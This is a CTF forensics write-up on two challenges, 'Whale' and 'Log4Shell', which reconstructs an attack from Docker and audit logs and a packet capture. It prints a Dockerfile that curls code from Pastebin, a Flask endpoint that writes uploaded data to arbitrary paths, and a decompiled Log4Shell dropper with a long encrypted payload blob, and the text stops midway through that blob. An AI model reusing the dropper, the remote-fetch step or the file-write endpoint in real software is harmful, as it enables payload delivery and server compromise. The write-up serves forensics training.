Cyber Jawara 2024

Write-ups for all the Forensics challenges in Cyber Jawara 2024.

Whale

Desc: Someone broke into our application server. Could you help to investigate what they did?

In this challenge, we are provided with a server dump containing multiple folders.

First, I open the app folder, which contains a Dockerfile to build the server.

The Dockerfile shows that to run the server, we need to use curl to fetch data from the given Pastebin links. Once we understand this, the next step is to check the logs generated while the Dockerfile is being executed.

FROM python:3-alpine

ENV PYTHONUNBUFFERED=1

WORKDIR /app

RUN apk add --no-cache \
    gcc \
    musl-dev \
    linux-headers \
    libffi-dev \
    openssl-dev \
    curl

RUN pip install --no-cache-dir Flask pycryptodome

ARG ID1
ARG ID2

RUN curl "https://pastebin.com/raw/YJqeFMMv"
RUN curl -o app.py "https://pastebin.com/raw/RaVtFnw9"

EXPOSE 5000

ENTRYPOINT ["python", "app.py"]

I checked all the folders containing logs and found the relevant log in /var/log/audit, which shows the execution details of the Dockerfile.

From that, we know the complete for that two pastebin links.

https://pastebin.com/raw/YJqeFMMv

Part 1: CJ{dae071f96aad

https://pastebin.com/raw/RaVtFnw9

from flask import Flask, request, jsonify
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import os

app = Flask(__name__)

@app.route('/upload', methods=['POST'])
def upload_file():
  # Get query parameters
  file_path = request.args.get('a')
  encryption_key = request.args.get('b')

  if not file_path:
    return jsonify({"error": "Query parameter 'a' is required for file path."}), 400

  try:
    # Get the Base64-encoded file content from the request body
    encoded_file = request.data.decode('utf-8')
    file_content = base64.b64decode(encoded_file)

    # If encryption key is provided, encrypt the file content
    if encryption_key:
      if len(encryption_key) not in (16, 24, 32):
        return jsonify({"error": "Encryption key must be 16, 24, or 32 bytes long."}), 400
      cipher = AES.new(encryption_key.encode('utf-8'), AES.MODE_ECB)
      file_content = cipher.encrypt(pad(file_content, AES.block_size))

    # Save the file
    os.makedirs(os.path.dirname(file_path), exist_ok=True)
    with open(file_path, 'wb') as f:
      f.write(file_content)

    return jsonify({"message": "File uploaded successfully."}), 200

  except base64.binascii.Error:
    return jsonify({"error": "Invalid Base64-encoded string."}), 400
  except Exception as e:
    return jsonify({"error": str(e)}), 500

if __name__ == '__main__':
  app.run(debug=True)

From those links, we obtain the first part of the flag, but it’s unclear how many parts the flag consists of in this challenge. We also obtained the code for app.py, which runs the server. It contains one endpoint with a POST method. The endpoint receives two parameters: a, which is the path to the file, and b, which is the encryption key. The purpose of this endpoint is to encrypt the file using the provided key. Now, let’s search the logs for the running server again.

We found the logs for the running server at var/lib/docker/containers/4e5f2fa4c43bba8c3123d068f2ec24e4399a860113d41cccbeb75c428cb04ebf/4e5f2fa4c43bba8c3123d068f2ec24e4399a860113d41cccbeb75c428cb04ebf-json.log

Which contains

{"log":" * Serving Flask app 'app'\n","stream":"stdout","time":"2025-01-09T06:24:09.897872504Z"}
{"log":" * Debug mode: on\n","stream":"stdout","time":"2025-01-09T06:24:09.898441023Z"}
{"log":"\u001b[31m\u001b[1mWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\u001b[0m\n","stream":"stderr","time":"2025-01-09T06:24:09.966796188Z"}
{"log":" * Running on all addresses (0.0.0.0)\n","stream":"stderr","time":"2025-01-09T06:24:09.966842827Z"}
{"log":" * Running on http://127.0.0.1:5000\n","stream":"stderr","time":"2025-01-09T06:24:09.966848468Z"}
{"log":" * Running on http://172.17.0.2:5000\n","stream":"stderr","time":"2025-01-09T06:24:09.966852626Z"}
{"log":"\u001b[33mPress CTRL+C to quit\u001b[0m\n","stream":"stderr","time":"2025-01-09T06:24:09.967351141Z"}
{"log":" * Restarting with stat\n","stream":"stderr","time":"2025-01-09T06:24:09.968766946Z"}
{"log":" * Debugger is active!\n","stream":"stderr","time":"2025-01-09T06:24:10.386381656Z"}
{"log":" * Debugger PIN: 673-288-487\n","stream":"stderr","time":"2025-01-09T06:24:10.387824912Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:24:36] \"\u001b[33mGET / HTTP/1.1\u001b[0m\" 404 -\n","stream":"stderr","time":"2025-01-09T06:24:36.26334873Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:25:31] \"\u001b[33mPOST /?a=/tmp/test HTTP/1.1\u001b[0m\" 404 -\n","stream":"stderr","time":"2025-01-09T06:25:31.852971084Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:25:41] \"POST /upload?a=/tmp/test HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:25:41.52350298Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:27:34] \"POST /upload?a=/tmp/what\u0026b=705f9dc63b9c3bfa HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:27:34.937305157Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:28:57] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:28:57.355517889Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:30:41] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:30:41.01378587Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:31:00] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:31:00.167349379Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:31:28] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:31:28.464410866Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:31:50] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:31:50.811240286Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:32:27] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:32:27.086314438Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:33:04] \"POST /upload?a=/tmp/what2\u0026b=705f9dc63b9c3bfa HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:33:04.811347946Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:36:22] \"POST /upload?a=/tmp/uploaded_file HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:36:22.331880092Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:38:47] \"POST /upload?a=/tmp/uploaded_file HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:38:47.720677553Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:40:02] \"POST /upload?a=/tmp/h3r3\u0026b=a2c31cd2a4c1bf6a HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:40:02.209540807Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:40:41] \"POST /upload?a=/tmp/n0\u0026b=a2c31cd2a4c1bf6a HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:40:41.390646324Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:40:57] \"POST /upload?a=/tmp/h3r3\u0026b=a2c31cd2a4c1bf6a HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:40:57.282394022Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:41:03] \"POST /upload?a=/tmp/n0\u0026b=a2c31cd2a4c1bf6a HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:41:03.313752062Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:42:50] \"POST /upload?a=/tmp/interesting HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:42:50.386944954Z"}

Seven suspicious files were uploaded using the endpoint, and four of them are encrypted. First, I opened each of the files that didn’t use an encryption key and found the second part of the flag in the /tmp/interesting file.

Part 2: fb8c2417ed67157

Next, I saved all the encrypted files along with their corresponding keys and created a script to decrypt them.

import os
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

files_to_decrypt = {
    "h3r3": "a2c31cd2a4c1bf6a",
    "n0": "a2c31cd2a4c1bf6a",
    "w00t": "64bc4dbca3c92adc",
    "what": "705f9dc63b9c3bfa",
    "what2": "705f9dc63b9c3bfa"
}

def decrypt_file(file_path, encryption_key):
    try:
        if len(encryption_key) not in (16, 24, 32):
            raise ValueError("Encryption key must be 16, 24, or 32 bytes long.")
        
        with open(file_path, 'rb') as f:
            encrypted_content = f.read()
        
        cipher = AES.new(encryption_key.encode('utf-8'), AES.MODE_ECB)

        decrypted_content = unpad(cipher.decrypt(encrypted_content), AES.block_size)
        
        # Print the decrypted content as a string
        print(f"Decrypted content of {file_path}:")
        print(decrypted_content.decode('utf-8', errors='ignore'))

    except Exception as e:
        print(f"Error during decryption of {file_path}: {e}")

for file, key in files_to_decrypt.items():
    if os.path.exists(file):
        decrypt_file(file, key)
    else:
        print(f"File not found: {file}")

And there is the result.

$ python decrypt.py   
Decrypted content of h3r3:
Part 3: 11cb9e36e6c1e}
Decrypted content of n0:
Not this
Decrypted content of w00t:

Error during decryption of what: Data must be aligned to block boundary in ECB mode
Decrypted content of what2:

FLAG:CJ{dae071f96aadfb8c2417ed6715711cb9e36e6c1e}

Log4Shell 1

Desc: Our application is still using vulnerable Log4j and someone just hacked us! Please help to investigate and find out what they did.

We have been provided with a PCAP file containing captured network traffic from the client’s application. Let’s opened it up use Wireshark.

Based on the title of the challenge, its provide a post-exploit of a log4shell (CVE-2021-44228), In the first, almost more than one hour, i confuse for the ldap link. But later i forget about it for a moment and see other package. There is 3779 package inside this captured network. Follow the TCP stream, luckily i got some interesting things. After the HTTP protocol called, the response leak each character for the endpoint request.

After each of HTTP request with GET method

There will be the responses, and each response leak a character.

The value of FLAGPART1 is determined to be C, and this pattern continues sequentially until FLAGPART34. Together, these variables combine to form the complete flag.

FLAG: CJ{c4n_y0u_c0ntinu3_unt1l_Flag_2}

Log4Shell 2

Desc: Our application is still using vulnerable Log4j and someone just hacked us! Please help to investigate and find out what they did. Note: There are two flags in this challenges (Which mean log4shell 2 is a continuation of part 1)

With the same attachment and description like Log4Shell 1, we continues our exploration to find the Flag 2. After each FLAG leaked, there is another file in the HTTP GET request, which is Dropper.class. Using this Decompiler , i got the original Dropper.java and analyze it.

import java.io.FileOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

public class Dropper {
   private static final String ALGORITHM = "AES";
   private static final String TRANSFORMATION = "AES/ECB/PKCS5Padding";

   private static String getSecretKey() throws Exception {
      Class var0 = Class.forName("java.lang.System");
      Method var1 = var0.getMethod("getenv", String.class);
      String var2 = "";

      for(int var3 = 1; var3 <= 16; ++var3) {
         var2 = var2 + (String)var1.invoke((Object)null, "FLAGPART" + var3);
      }

      return var2;
   }

   public static void decryptToFile(String var0, String var1) throws Exception {
      String var2 = getSecretKey();
      Class var3 = Class.forName("java.util.Base64");
      Method var4 = var3.getMethod("getDecoder");
      Object var5 = var4.invoke((Object)null);
      Method var6 = var5.getClass().getMethod("decode", String.class);
      byte[] var7 = (byte[])((byte[])var6.invoke(var5, var0));
      Class var8 = Class.forName("javax.crypto.spec.SecretKeySpec");
      Constructor var9 = var8.getConstructor(byte[].class, String.class);
      Object var10 = var9.newInstance(var2.getBytes(), "AES");
      Class var11 = Class.forName("javax.crypto.Cipher");
      Method var12 = var11.getMethod("getInstance", String.class);
      Object var13 = var12.invoke((Object)null, "AES/ECB/PKCS5Padding");
      Method var14 = var11.getMethod("init", Integer.TYPE, Class.forName("java.security.Key"));
      Method var15 = var11.getMethod("doFinal", byte[].class);
      var14.invoke(var13, 2, var10);
      byte[] var16 = (byte[])((byte[])var15.invoke(var13, var7));
      FileOutputStream var17 = new FileOutputStream(var1);
      Throwable var18 = null;

      try {
         var17.write(var16);
      } catch (Throwable var27) {
         var18 = var27;
         throw var27;
      } finally {
         if (var17 != null) {
            if (var18 != null) {
               try {
                  var17.close();
               } catch (Throwable var26) {
                  var18.addSuppressed(var26);
               }
            } else {
               var17.close();
            }
         }

      }

   }

   static {
      try {
         String var0 = "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